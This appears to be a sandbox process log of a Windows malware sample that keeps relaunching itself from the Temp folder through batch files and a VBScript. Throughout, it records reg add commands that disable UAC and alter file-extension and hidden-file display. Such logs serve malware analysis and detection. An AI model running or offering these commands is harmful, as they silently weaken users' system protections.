C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3372 -ip 3372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4028 -ip 4028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 376

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 260

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eiAsscsg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\niYwoMEM.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hqsoYoow.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZMgAIcgI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IegwoAsY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mcsAAgos.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FuckwYEI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TqogQMIw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mUMsIUsw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZokwQIEw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MOUgEIkY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dmkwMsII.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iYkwkMQw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SGMgwAwE.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OoIAgIAY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UCkAIIMk.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hOEscksA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xUIgYwgw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jUAEIokI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pwIosUkI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SMQAUEsQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

